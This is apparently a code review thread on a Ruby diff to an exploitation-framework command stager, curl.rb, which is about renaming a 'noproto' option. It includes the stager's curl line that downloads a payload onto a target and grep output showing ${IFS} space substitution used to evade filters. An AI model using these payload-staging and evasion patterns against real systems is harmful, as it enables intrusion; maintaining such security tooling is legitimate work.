lib/rex/exploitation/cmdstager/curl.rb

```diff
@@ -24,11 +24,13 @@ def generate(opts = {})
 
   def generate_cmds_payload(opts)
     cmds = []
+    uri = opts[:payload_uri]
 
     if opts[:ssl]
-      cmds << "curl -kso #{@payload_path} #{opts[:payload_uri]}"
+      cmds << "curl -kso #{@payload_path} #{uri}"
     else
-      cmds << "curl -so #{@payload_path} #{opts[:payload_uri]}"
+      uri = uri.gsub(%r{^http://}, '') if opts[:noproto]
```

Comment:
```suggestion
      uri = uri.gsub(%r{^http://}, '') if opts[:no_proto]
```

Just as it aligns with other examples such as `:no_pass_prompt`, `:no_full_stop`, `:no_equals` etc

Reply:
Fixed

Reply:
Also:

```
# grep -rn :no /var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/ | fgrep -v :no_
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/fetch.rb:43:    cmds << "rm -f #{@payload_path}" unless opts[:nodelete]
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/fetch.rb:49:    cmds.each { |cmd| cmd.gsub!(/\s+/, '${IFS}') } if opts[:nospace]
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/debug_write.rb:117:    if (not opts[:nodelete])
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/wget.rb:46:    cmds << "rm -f #{@payload_path}" unless opts[:nodelete]
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/wget.rb:52:    cmds.each { |cmd| cmd.gsub!(/\s+/, '${IFS}') } if opts[:nospace]
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/bourne.rb:105:    if (not opts[:nodelete])
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/debug_asm.rb:122:    if (not opts[:nodelete])
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/curl.rb:44:    cmds << "rm -f #{@payload_path}" unless opts[:nodelete]
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/curl.rb:50:    cmds.each { |cmd| cmd.gsub!(/\s+/, '${IFS}') } if opts[:nospace]
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/psh_invokewebrequest.rb:37:    cmds << "del #{@payload_path}" unless opts[:nodelete]
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/printf.rb:33:    if opts[:noquotes]
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/printf.rb:113:    unless opts[:nodelete]
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/tftp.rb:55:    if (not opts[:nodelete])
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/lwprequest.rb:38:    cmds << "rm -f #{@payload_path}" unless opts[:nodelete]
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/lwprequest.rb:44:    cmds.each { |cmd| cmd.gsub!(/\s+/, '${IFS}') } if opts[:nospace]
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/echo.rb:54:    unless opts[:noargs]
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/echo.rb:124:    unless opts[:nodelete]
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/vbs.rb:109:    if (not opts[:nodelete])
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/base.rb:133:    return cmds if opts[:noconcat]
/var/lib/gems/2.7.0/gems/rex-exploitation-0.1.29/lib/rex/exploitation/cmdstager/certutil.rb:97:    if (not opts[:nodelete])
```